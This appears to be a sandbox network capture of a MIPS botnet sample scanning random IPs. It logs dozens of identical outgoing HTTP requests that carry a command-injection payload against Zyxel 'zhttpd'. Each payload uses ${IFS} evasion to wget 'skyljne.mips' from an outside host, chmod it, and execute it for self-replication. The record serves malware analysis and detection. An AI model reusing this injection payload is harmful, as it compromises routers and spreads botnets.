                                          Jan 14, 2024 15:46:30.314342022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7872192.168.2.233990889.215.102.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314371109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7873192.168.2.2350498223.204.51.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314410925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7874192.168.2.2342630124.120.71.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314420938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7875192.168.2.2346522105.154.22.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314443111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7876192.168.2.2346602204.132.207.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314476967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7877192.168.2.2359374126.197.168.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314523935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7878192.168.2.2355672126.3.30.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314523935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7879192.168.2.234314667.240.87.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314547062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7880192.168.2.2340972124.255.112.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314580917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7881192.168.2.2358500156.248.3.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314605951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7882192.168.2.235177819.82.77.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314636946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7883192.168.2.2342674102.122.250.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314673901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7884192.168.2.2337078157.1.142.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314703941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7885192.168.2.2345786191.104.43.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314717054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7886192.168.2.2337790162.54.23.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314719915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7887192.168.2.2357438217.89.142.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314778090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7888192.168.2.233880898.250.171.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314795971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7889192.168.2.236054464.125.88.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314815044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7890192.168.2.235108850.7.60.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314826965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7891192.168.2.234486835.80.63.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314871073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7892192.168.2.234985080.163.14.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314912081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7893192.168.2.234869850.210.229.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314950943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7894192.168.2.234555632.65.195.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314953089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7895192.168.2.2334366209.171.130.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314990997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7896192.168.2.2339288204.27.210.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.315015078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7897192.168.2.2356808151.4.90.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.315066099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7898192.168.2.2351068160.164.239.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.315085888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7899192.168.2.234260459.16.100.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.315109015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7900192.168.2.2338028132.192.242.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.315146923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7901192.168.2.2347196181.21.181.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.315155983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7902192.168.2.2347310104.53.142.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.315156937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7903192.168.2.2339916211.9.108.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.315187931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7904192.168.2.234446634.146.246.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.315193892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7905192.168.2.233614061.68.163.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.315265894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7906192.168.2.235651646.31.238.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.315289974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7907192.168.2.235408491.98.109.23443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.315319061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7908192.168.2.233997699.134.151.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.315339088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7909192.168.2.2356562115.139.140.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.317954063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7910192.168.2.2352582207.88.209.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.329787016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7911192.168.2.2357238201.234.151.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.329814911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7912192.168.2.2345202131.252.149.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.329838037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7913192.168.2.2350806173.150.189.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.329855919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7914192.168.2.2338168182.118.121.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.329905033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7915192.168.2.2359974189.160.253.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.329935074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7916192.168.2.2339628148.208.204.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.329972029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7917192.168.2.2354260150.85.27.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330001116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7918192.168.2.235443677.4.207.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330034971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7919192.168.2.2357216182.49.91.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330075026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7920192.168.2.2355682107.29.10.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330089092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7921192.168.2.234364645.54.195.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330121040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7922192.168.2.235469272.234.22.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330171108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7923192.168.2.2359368140.82.146.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330208063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7924192.168.2.234669648.25.217.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330228090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7925192.168.2.235344619.43.254.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330245972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7926192.168.2.234992837.6.146.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330276966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7927192.168.2.2333462108.14.68.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330307007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7928192.168.2.2356318139.10.209.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330347061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7929192.168.2.2336158179.2.219.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330360889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7930192.168.2.2340020130.254.169.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330384016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7931192.168.2.233991498.100.224.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330416918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7932192.168.2.2357036202.67.178.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330456018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7933192.168.2.234510297.215.58.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330473900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7934192.168.2.234837891.170.70.124443
                                          TimestampBytes transferredDirectionData
